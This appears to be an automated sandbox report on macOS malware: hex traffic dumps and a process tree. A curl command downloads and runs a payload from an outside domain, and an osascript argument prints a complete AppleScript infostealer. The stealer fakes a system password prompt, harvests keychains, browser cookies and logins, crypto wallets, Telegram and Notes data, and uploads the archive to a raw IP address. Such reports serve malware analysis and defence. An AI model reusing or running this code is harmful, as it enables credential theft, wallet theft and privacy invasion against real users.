                                                                      2025-01-19 19:31:52 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      2025-01-19 19:31:52 UTC16384INData Raw: 63 37 31 36 62 35 34 37 38 37 34 35 37 37 39 36 32 36 37 36 64 33 66 37 34 32 33 32 35 34 32 33 31 32 64 36 62 35 31 34 30 36 63 34 63 37 39 35 34 35 31 33 31 37 39 36 63 33 65 33 31 33 66 34 39 34 30 36 62 37 39 36 32 37 31 34 62 37 39 34 35 32 33 32 35 34 32 33 34 32 31 33 31 34 32 36 63 37 31 36 38 34 31 34 39 35 35 34 63 34 33 36 32 37 34 36 64 34 32 36 32 36 33 36 38 35 34 37 38 37 34 36 64 34 31 37 34 33 36 34 62 35 31 36 66 37 34 35 37 36 36 36 32 36 37 32 35 34 32 33 31 34 30 34 63 34 32 36 32 35 34 34 63 36 34 34 39 34 30 36 62 37 33 33 32 36 65 36 64 34 32 35 31 35 31 36 64 34 32 37 37 35 31 35 37 33 66 36 32 35 35 36 64 34 32 36 32 36 66 32 35 34 32 33 31 35 35 35 37 37 39 36 37 35 31 34 63 36 36 35 36 35 31 36 38 37 33 33 32 35 32 33 33 36 37
                                                                      Data Ascii: c716b547874577962676d3f74232542312d6b51406c4c79545131796c3e313f49406b7962714b7945232542342131426c71684149554c4362746d426263685478746d4174364b516f7457666267254231404c4262544c6449406b73326e6d4251516d427751573f62556d42626f25423155577967514c665651687332523367
                                                                      2025-01-19 19:31:52 UTC16384INData Raw: 34 32 31 33 31 36 36 34 30 34 30 33 39 36 36 36 64 32 36 33 39 34 33 36 64 36 65 33 31 34 32 34 35 36 33 33 39 36 34 33 32 37 38 35 36 34 33 34 36 36 65 34 63 37 39 33 36 36 66 35 36 36 36 37 33 34 65 33 39 37 39 33 65 34 64 33 30 34 62 35 39 34 64 35 36 37 39 36 65 37 38 33 39 34 32 34 36 34 64 33 31 33 66 33 32 36 66 33 39 36 36 37 34 36 65 35 37 34 32 37 33 36 66 33 39 37 39 33 63 32 33 34 63 37 39 34 35 37 30 33 39 36 36 37 34 35 30 33 39 34 33 34 35 34 30 34 63 36 36 33 63 34 64 33 39 34 33 34 34 34 64 33 30 34 62 35 39 34 64 33 39 34 32 34 35 34 30 33 31 36 36 36 65 34 30 33 31 36 36 33 34 32 33 33 39 34 32 36 64 32 31 33 39 36 36 33 63 36 65 33 31 34 33 33 36 36 65 33 31 37 39 36 64 32 33 33 31 34 33 33 31 32 31 35 36 36 36 33 34 34 30 35 37 34 32
                                                                      Data Ascii: 4213166404039666d2639436d6e31424563396432785643466e4c79366f5666734e39793e4d304b594d56796e783942464d313f326f3966746e5742736f39793c234c79457039667450394345404c663c4d3943444d304b594d3942454031666e403166342339426d2139663c6e3143366e31796d2331433121566634405742


                                                                      System Behavior

                                                                      General

                                                                      Start time (UTC):19:31:45
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/libexec/xpcproxy
                                                                      Arguments:-
                                                                      File size:44048 bytes
                                                                      MD5 hash:4764d9eafe6b7dac23253a9f8b7f73d6

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:45
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/libexec/nsurlstoraged
                                                                      Arguments:/usr/libexec/nsurlstoraged --privileged
                                                                      File size:246624 bytes
                                                                      MD5 hash:321b0a40e24b45f0af49ba42742b3f64

                                                                      File Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:49
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32
                                                                      Arguments:-
                                                                      File size:3722408 bytes
                                                                      MD5 hash:8910349f44a940d8d79318367855b236

                                                                      File Activities

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:49
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:/bin/sh -c curl -o /tmp/update https://norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:49
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:49
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/curl
                                                                      Arguments:curl -o /tmp/update https://norikosumiya.com/brew/update
                                                                      File size:185072 bytes
                                                                      MD5 hash:2418204e23e2952e7995f1819a1f78f5

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/xattr
                                                                      Arguments:xattr -c /tmp/update
                                                                      File size:925 bytes
                                                                      MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
                                                                      Arguments:/usr/bin/python /usr/bin/xattr-2.7 -c /tmp/update
                                                                      File size:51744 bytes
                                                                      MD5 hash:710c6cc30780eea712240851b44d9eab

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/chmod
                                                                      Arguments:chmod +x /tmp/update
                                                                      File size:34144 bytes
                                                                      MD5 hash:917cfbf6084318922f8091f050a0bbed

                                                                      File Activities

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/tmp/update
                                                                      Arguments:/tmp/update
                                                                      File size:234656 bytes
                                                                      MD5 hash:0418181caaba4686fae772b60d9a2c62

                                                                      File Activities

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/pkill
                                                                      Arguments:pkill Terminal
                                                                      File size:30512 bytes
                                                                      MD5 hash:ad01660bd9fdfcf9c67a4879e06d0aa3

                                                                      File Activities

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:-
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      File Activities

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:52
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/osascript
                                                                      Arguments:osascript -e set release to trueset filegrabbers to trueon filesizer(paths)set fsz to 0tryset theItem to quoted form of POSIX path of pathsset fsz to (do shell script '/usr/bin/mdls -name kMDItemFSSize -raw ' & theItem)end tryreturn fszend filesizeron mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryend FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryend BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon readwrite2(path_to_file, path_as_save)tryset folderPath to do shell script 'dirname ' & quoted form of path_as_savemkdir(folderPath)tell application 'Finder' set sourceFile to POSIX file path_to_file as alias set destinationFolder to POSIX file folderPath as alias duplicate sourceFile to destinationFolder with replacingend tellend tryend readwrite2on isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifreturn falseend tryend isDirectoryon GrabFolderLimit(sourceFolder, destinationFolder)tryset bankSize to 0set exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolderLimit(itemPath, savePath)elseset fsz to filesizer(itemPath)set bankSize to bankSize + fszif bankSize < 10 * 1024 * 1024 thenreadwrite(itemPath, savePath)end ifend ifend ifend repeatend tryend GrabFolderLimiton GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'dumps', 'emoji', 'user_data', '__update__', 'user_data#2', 'user_data#3'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon parseFF(firefox, writemind)tryset myFiles to {'/cookies.sqlite', '/formhistory.sqlite', '/key4.db', '/logins.json'}set fileList to list folder firefox without invisiblesrepeat with currentItem in fileListset fpath to writemind & 'ff/' & currentItemset readpath to firefox & currentItemrepeat with FFile in myFilesreadwrite(readpath & FFile, fpath & FFile)end repeatend repeatend tryend parseFFon checkvalid(username, password_entered)tryset result to do shell script 'dscl . authonly ' & quoted form of username & space & quoted form of password_enteredif result is not equal to '' thenreturn falseelsereturn trueend ifon errorreturn falseend tryend checkvalidon getpwd(username, writemind)tryif checkvalid(username, '') thenset result to do shell script 'security 2>&1 > /dev/null find-generic-password -ga \'Chrome\' | awk \'{print $2}\''writeText(result as string, writemind & 'masterpass-chrome')elserepeatset result to display dialog 'Required Application Helper.\nPlease enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'System Preferences' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) thenwriteText(password_entered, writemind & 'pwd')return password_enteredend ifend repeatend ifend tryreturn ''end getpwdon grabPlugins(paths, savePath, pluginList, index)tryset fileList to list folder paths without invisiblesrepeat with PFile in fileListrepeat with Plugin in pluginListif (PFile contains Plugin) thenset newpath to paths & PFileset newsavepath to savePath & '/' & Pluginif index thenset newsavepath to newsavepath & '/IndexedDB/'end ifGrabFolder(newpath, newsavepath)end ifend repeatend repeatend tryend grabPluginson chromium(writemind, chromium_map)set pluginList to {'keenhcnmdmjjhincpilijphpiohdppno', 'hbbgbephgojikajhfbomhlmmollphcad', 'cjmkndjhnagcfbpiemnkdpomccnjblmj', 'dhgnlgphgchebgoemcjekedjjbifijid', 'hifafgmccdpekplomjjkcfgodnhcellj', 'kamfleanhcmjelnhaeljonilnmjpkcjc', 'jnldfbidonfeldmalbflbmlebbipcnle', 'fdcnegogpncmfejlfnffnofpngdiejii', 'klnaejjgbibmhlephnhpmaofohgkpgkd', 'pdadjkfkgcafgbceimcpbkalnfnepbnk', 'kjjebdkfeagdoogagbhepmbimaphnfln', 'ldinpeekobnhjjdofggfgjlcehhmanlj', 'dkdedlpgdmmkkfjabffeganieamfklkm', 'bcopgchhojmggmffilplmbdicgaihlkp', 'kpfchfdkjhcoekhdldggegebfakaaiog', 'idnnbdplmphpflfnlkomgpfbpcgelopg', 'mlhakagmgkmonhdonhkpjeebfphligng', 'bipdhagncpgaccgdbddmbpcabgjikfkn', 'gcbjmdjijjpffkpbgdkaojpmaninaion', 'nhnkbkgjikgcigadomkphalanndcapjk', 'bhhhlbepdkbapadjdnnojkbgioiodbic', 'hoighigmnhgkkdaenafgnefkcmipfjon', 'klghhnkeealcohjjanjjdaeeggmfmlpl', 'nkbihfbeogaeaoehlefnkodbefgpgknn', 'fhbohimaelbohpjbbldcngcnapndodjp', 'ebfidpplhabeedpnhjnobghokpiioolj', 'emeeapjkbcbpbpgaagfchmcgglmebnen', 'fldfpgipfncgndfolcbkdeeknbbbnhcc', 'penjlddjkjgpnkllboccdgccekpkcbin', 'fhilaheimglignddkjgofkcbgekhenbh', 'hmeobnfnfcmdkdcmlblgagmfpfboieaf', 'cihmoadaighcejopammfbmddcmdekcje', 'lodccjjbdhfakaekdiahmedfbieldgik', 'omaabbefbmiijedngplfjmnooppbclkk', 'cjelfplplebdjjenllpjcblmjkfcffne', 'jnlgamecbpmbajjfhmmmlhejkemejdma', 'fpkhgmpbidmiogeglndfbkegfdlnajnf', 'bifidjkcdpgfnlbcjpdkdcnbiooooblg', 'amkmjjmmflddogmhpjloimipbofnfjih', 'flpiciilemghbmfalicajoolhkkenfel', 'hcflpincpppdclinealmandijcmnkbgn', 'aeachknmefphepccionboohckonoeemg', 'nlobpakggmbcgdbpjpnagmdbdhdhgphk', 'momakdpclmaphlamgjcndbgfckjfpemp', 'mnfifefkajgofkcjkemidiaecocnkjeh', 'fnnegphlobjdpkhecapkijjdkgcjhkib', 'ehjiblpccbknkgimiflboggcffmpphhp', 'ilhaljfiglknggcoegeknjghdgampffk', 'pgiaagfkgcbnmiiolekcfmljdagdhlcm', 'fnjhmkhhmkbjkkabndcnnogagogbneec', 'bfnaelmomeimhlpmgjnjophhpkkoljpa', 'imlcamfeniaidioeflifonfjeeppblda', 'mdjmfdffdcmnoblignmgpommbefadffd', 'ooiepdgjjnhcmlaobfinbomgebfgablh', 'pcndjhkinnkaohffealmlmhaepkpmgkb', 'ppdadbejkmjnefldpcdjhnkpbjkikoip', 'cgeeodpfagjceefieflmdfphplkenlfk', 'dlcobpjiigpikoobohmabehhmhfoodbb', 'jiidiaalihmmhddjgbnbgdfflelocpak', 'bocpokimicclpaiekenaeelehdjllofo', 'pocmplpaccanhmnllbbkpgfliimjljgo', 'cphhlgmgameodnhkjdmkpanlelnlohao', 'mcohilncbfahbmgdjkbpemcciiolgcge', 'bopcbmipnjdcdfflfgjdgdjejmgpoaab', 'khpkpbbcccdmmclmpigdgddabeilkdpd', 'ejjladinnckdgjemekebdpeokbikhfci', 'phkbamefinggmakgklpkljjmgibohnba', 'epapihdplajcdnnkdeiahlgigofloibg', 'hpclkefagolihohboafpheddmmgdffjm', 'cjookpbkjnpkmknedggeecikaponcalb', 'cpmkedoipcpimgecpmgpldfpohjplkpp', 'modjfdjcodmehnpccdjngmdfajggaoeh', 'ibnejdfjmmkpcnlpebklmnkoeoihofec', 'afbcbjpbpfadlkmhmclhkeeodmamcflc', 'kncchdigobghenbbaddojjnnaogfppfj', 'efbglgofoippbgcjepnhiblaibcnclgk', 'mcbigmjiafegjnnogedioegffbooigli', 'fccgmnglbhajioalokbcidhcaikhlcpm', 'hnhobjmcibchnmglfbldbfabcgaknlkj', 'apnehcjmnengpnmccpaibjmhhoadaico', 'enabgbdfcbaehmbigakijjabdpdnimlg', 'mgffkfbidihjpoaomajlbgchddlicgpn', 'fopmedgnkfpebgllppeddmmochcookhc', 'jojhfeoedkpkglbfimdfabpdfjaoolaf', 'ammjlinfekkoockogfhdkgcohjlbhmff', 'abkahkcbhngaebpcgfmhkoioedceoigp', 'dcbjpgbkjoomeenajdabiicabjljlnfp', 'gkeelndblnomfmjnophbhfhcjbcnemka', 'pnndplcbkakcplkjnolgbkdgjikjednm', 'copjnifcecdedocejpaapepagaodgpbh', 'hgbeiipamcgbdjhfflifkgehomnmglgk', 'mkchoaaiifodcflmbaphdgeidocajadp', 'ellkdbaphhldpeajbepobaecooaoafpg', 'mdnaglckomeedfbogeajfajofmfgpoae', 'nknhiehlklippafakaeklbeglecifhad', 'ckklhkaabbmdjkahiaaplikpdddkenic', 'fmblappgoiilbgafhjklehhfifbdocee', 'nphplpgoakhhjchkkhmiggakijnkhfnd', 'cnmamaachppnkjgnildpdmkaakejnhae', 'fijngjgcjhjmmpcmkeiomlglpeiijkld', 'niiaamnmgebpeejeemoifgdndgeaekhe', 'odpnjmimokcmjgojhnhfcnalnegdjmdn', 'lbjapbcmmceacocpimbpbidpgmlmoaao', 'hnfanknocfeofbddgcijnmhnfnkdnaad', 'hpglfhgfnhbgpjdenjgmdgoeiappafln', 'egjidjbpglichdcondbcbdnbeeppgdph', 'ibljocddagjghmlpgihahamcghfggcjc', 'gkodhkbmiflnmkipcmlhhgadebbeijhh', 'dbgnhckhnppddckangcjbkjnlddbjkna', 'mfhbebgoclkghebffdldpobeajmbecfk', 'nlbmnnijcnlegkjjpcfjclmcfggfefdm', 'nlgbhdfgdhgbiamfdfmbikcdghidoadd', 'acmacodkjbdgmoleebolmdjonilkdbch', 'agoakfejjabomempkjlepdflaleeobhb', 'dgiehkgfknklegdhekgeabnhgfjhbajd', 'onhogfjeacnfoofkfgppdlbmlmnplgbn', 'kkpehldckknjffeakihjajcjccmcjflh', 'jaooiolkmfcmloonphpiiogkfckgciom', 'ojggmchlghnjlapmfbnjholfjkiidbch', 'pmmnimefaichbcnbndcfpaagbepnjaig', 'oiohdnannmknmdlddkdejbmplhbdcbee', 'aiifbnbfobpmeekipheeijimdpnlpgpp', 'aholpfdialjgjfhomihkjbmgjidlcdno', 'anokgmphncpekkhclmingpimjmcooifb', 'kkpllkodjeloidieedojogacfhpaihoh', 'iokeahhehimjnekafflcihljlcjccdbe', 'ifckdpamphokdglkkdomedpdegcjhjdp', 'loinekcabhlmhjjbocijdoimmejangoa', 'fcfcfllfndlomdhbehjjcoimbgofdncg', 'ifclboecfhkjbpmhgehodcjpciihhmif', 'dmkamcknogkgcdfhhbddcghachkejeap', 'ookjlbkiijinhpmnjffcofjonbfbgaoc', 'oafedfoadhdjjcipmcbecikgokpaphjk', 'mapbhaebnddapnmifbbkgeedkeplgjmf', 'cmndjbecilbocjfkibfbifhngkdmjgog', 'kpfopkelmapcoipemfendmdcghnegimn', 'lgmpcpglpngdoalbgeoldeajfclnhafa', 'ppbibelpcjmhbdihakflkdcoccbgbkpo', 'ffnbelfdoeiohenkjibnmadjiehjhajb', 'opcgpfmipidbgpenhmajoajpbobppdil', 'lakggbcodlaclcbbbepmkpdhbcomcgkd', 'kgdijkcfiglijhaglibaidbipiejjfdp', 'hdkobeeifhdplocklknbnejdelgagbao', 'lnnnmfcpbkafcpgdilckhmhbkkbpkmid', 'nbdhibgjnjpnkajaghbffjbkcgljfgdi', 'kmhcihpebfmpgmihbkipmjlmmioameka', 'kmphdnilpmdejikjdnlbcnmnabepfgkh', 'nngceckbapebfimnlniiiahkandclblb'}set chromiumFiles to {'/Network/Cookies', '/Cookies', '/Web Data', '/Login Data', '/Local Extension Settings/', '/IndexedDB/'}repeat with chromium in chromium_mapset savePath to writemind & 'Chromium/' & item 1 of chromium & '_'tryset fileList to list folder item 2 of chromium without invisiblesrepeat with currentItem in fileListif ((currentItem as string) is equal to 'Default') or ((currentItem as string) contains 'Profile') thenrepeat with CFile in chromiumFilesset readpath to (item 2 of chromium & currentItem & CFile)if ((CFile as string) is equal to '/Network/Cookies') thenset CFile to '/Cookies'end ifif ((CFile as string) is equal to '/Local Extension Settings/') thengrabPlugins(readpath, savePath & currentItem, pluginList, false)else if (CFile as string) is equal to '/IndexedDB/' thengrabPlugins(readpath, savePath & currentItem, pluginList, true)elseset writepath to savePath & currentItem & CFilereadwrite(readpath, writepath)end ifend repeatend ifend repeatend tryend repeatend chromiumon telegram(writemind, library)tryGrabFolder(library & 'Telegram Desktop/tdata/', writemind & 'Telegram Data/')end tryend telegramon deskwallets(writemind, deskwals)repeat with deskwal in deskwalstryGrabFolder(item 2 of deskwal, writemind & item 1 of deskwal)end tryend repeatend deskwalletson filegrabber(writemind)tryset destinationFolderPath to POSIX file (writemind & 'FileGrabber/')mkdir(destinationFolderPath)set photosPath to POSIX file (writemind & 'FileGrabber/NotesFiles/')mkdir(photosPath)set extensionsList to {'txt', 'pdf', 'docx', 'wallet', 'key', 'keys', 'doc'}set bankSize to 0tell application 'Finder'tryset safariFolderPath to (path to home folder as text) & 'Library:Cookies:'duplicate file (safariFolderPath & 'Cookies.binarycookies') to folder destinationFolderPath with replacingset name of result to 'saf1'end trytryset safariFolder to ((path to library folder from user domain as text) & 'Containers:com.apple.Safari:Data:Library:Cookies:')tryduplicate file 'Cookies.binarycookies' of folder safariFolder to folder destinationFolderPath with replacingend tryset notesFolderPath to (path to home folder as text) & 'Library:Group Containers:group.com.apple.notes:'set notesAccounts to folder (notesFolderPath & 'Accounts:LocalAccount:Media')duplicate notesAccounts to photosPath with replacingduplicate notesAccounts to POSIX file photosPath as alias with replacingset notesFolder to folder notesFolderPathset notesFiles to {'NoteStore.sqlite', 'NoteStore.sqlite-shm', 'NoteStore.sqlite-wal'}repeat with fileName in notesFilesset sourceFile to file fileName of notesFolderduplicate sourceFile to POSIX file destinationFolderPath as alias with replacingend repeatend trytryset desktopFiles to every file of desktopset documentsFiles to every file of folder 'Documents' of (path to home folder)set downloadsFiles to every file of folder 'Downloads' of (path to home folder)repeat with aFile in (desktopFiles & documentsFiles & downloadsFiles)set fileExtension to name extension of aFileif fileExtension is in extensionsList thenset filesize to size of aFileif filesize < 3 * 1024 * 1024 thenif (bankSize + filesize) < 30 * 1024 * 1024 thentryduplicate aFile to folder destinationFolderPath with replacingset bankSize to bankSize + filesizeend tryelseexit repeatend ifend ifend ifend repeatend tryend tellend tryend filegrabberon send_data(attempt) try set result_send to (do shell script 'curl -X POST -H \'user: ymM2-77UrW/epIPnrITeT7qu1/XI5sTSC8oK392uMYc=\' -H \'BuildID: GJ/sZekKeEGa8X-KPvO2Y5O6k02IBQT82R/9YoFGnD0=\' -H \'cl: 0\' -H \'cn: 0\' --max-time 300 -retry 5 -retry-delay 10 -F \'file=@/tmp/out.zip\' http://81.19.135.54/joinsystem') on error if attempt < 40 then delay 3 send_data(attempt + 1) end if end tryend send_dataset username to (system attribute 'USER')set profile to '/Users/' & usernameset randomNumber to do shell script 'echo $((RANDOM % 9000 + 1000))'set writemind to '/tmp/' & randomNumber & '/'tryset result to (do shell script 'system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType')writeText(result, writemind & 'info')end tryset library to profile & '/Library/Application Support/'set password_entered to getpwd(username, writemind)delay 0.01set chromiumMap to {{'Chrome', library & 'Google/Chrome/'}, {'Brave', library & 'BraveSoftware/Brave-Browser/'}, {'Edge', library & 'Microsoft Edge/'}, {'Vivaldi', library & 'Vivaldi/'}, {'Opera', library & 'com.operasoftware.Opera/'}, {'OperaGX', library & 'com.operasoftware.OperaGX/'}, {'Chrome Beta', library & 'Google/Chrome Beta/'}, {'Chrome Canary', library & 'Google/Chrome Canary'}, {'Chromium', library & 'Chromium/'}, {'Chrome Dev', library & 'Google/Chrome Dev/'}, {'Arc', library & 'Arc/'}, {'Coccoc', library & 'Coccoc/'}}set walletMap to {{'deskwallets/Electrum', profile & '/.electrum/wallets/'}, {'deskwallets/Coinomi', library & 'Coinomi/wallets/'}, {'deskwallets/Exodus', library & 'Exodus/'}, {'deskwallets/Atomic', library & 'atomic/Local Storage/leveldb/'}, {'deskwallets/Wasabi', profile & '/.walletwasabi/client/Wallets/'}, {'deskwallets/Ledger_Live', library & 'Ledger Live/'}, {'deskwallets/Monero', profile & '/Monero/wallets/'}, {'deskwallets/Bitcoin_Core', library & 'Bitcoin/wallets/'}, {'deskwallets/Litecoin_Core', library & 'Litecoin/wallets/'}, {'deskwallets/Dash_Core', library & 'DashCore/wallets/'}, {'deskwallets/Electrum_LTC', profile & '/.electrum-ltc/wallets/'}, {'deskwallets/Electron_Cash', profile & '/.electron-cash/wallets/'}, {'deskwallets/Guarda', library & 'Guarda/'}, {'deskwallets/Dogecoin_Core', library & 'Dogecoin/wallets/'}, {'deskwallets/Trezor_Suite', library & '@trezor/suite-desktop/'}}readwrite(library & 'Binance/app-store.json', writemind & 'deskwallets/Binance/app-store.json')readwrite(library & '@tonkeeper/desktop/config.json', 'deskwallets/TonKeeper/config.json')readwrite(profile & '/Library/Keychains/login.keychain-db', writemind & 'keychain')if release thenreadwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite', writemind & 'FileGrabber/NoteStore.sqlite')readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-wal', writemind & 'FileGrabber/NoteStore.sqlite-wal')readwrite2(profile & '/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite-shm', writemind & 'FileGrabber/NoteStore.sqlite-shm')readwrite2(profile & '/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/Cookies.binarycookies')readwrite(profile & '/Library/Cookies/Cookies.binarycookies', writemind & 'FileGrabber/saf1')end ifif filegrabbers thenfilegrabber(writemind)end ifwriteText(username, writemind & 'username')set ff_paths to {library & 'Firefox/Profiles/', library & 'Waterfox/Profiles/', library & 'Pale Moon/Profiles/'}repeat with firefox in ff_pathstryparseFF(firefox, writemind)end tryend repeatchromium(writemind, chromiumMap)deskwallets(writemind, walletMap)telegram(writemind, library)do shell script 'ditto -c -k --sequesterRsrc ' & writemind & ' /tmp/out.zip'send_data(0)do shell script 'rm -r ' & writeminddo shell script 'rm /tmp/out.zip'
                                                                      File size:43232 bytes
                                                                      MD5 hash:f13b7c85f3c1c08fae3b709a536281a1

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:53
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/osascript
                                                                      Arguments:-
                                                                      File size:43232 bytes
                                                                      MD5 hash:f13b7c85f3c1c08fae3b709a536281a1

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:53
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:sh -c echo $((RANDOM % 9000 + 1000))
                                                                      File size:618480 bytes
                                                                      MD5 hash:be55e8952a262d0e524239dbf82191ed

                                                                      File Activities

                                                                      Process Activities

                                                                      System Activities

                                                                      General

                                                                      Start time (UTC):19:31:53
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/usr/bin/osascript
                                                                      Arguments:-
                                                                      File size:43232 bytes
                                                                      MD5 hash:f13b7c85f3c1c08fae3b709a536281a1

                                                                      Process Activities

                                                                      General

                                                                      Start time (UTC):19:31:53
                                                                      Start date (UTC):19/01/2025
                                                                      Path:/bin/sh
                                                                      Arguments:sh -c system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
                                                                      File size:618480 bytes
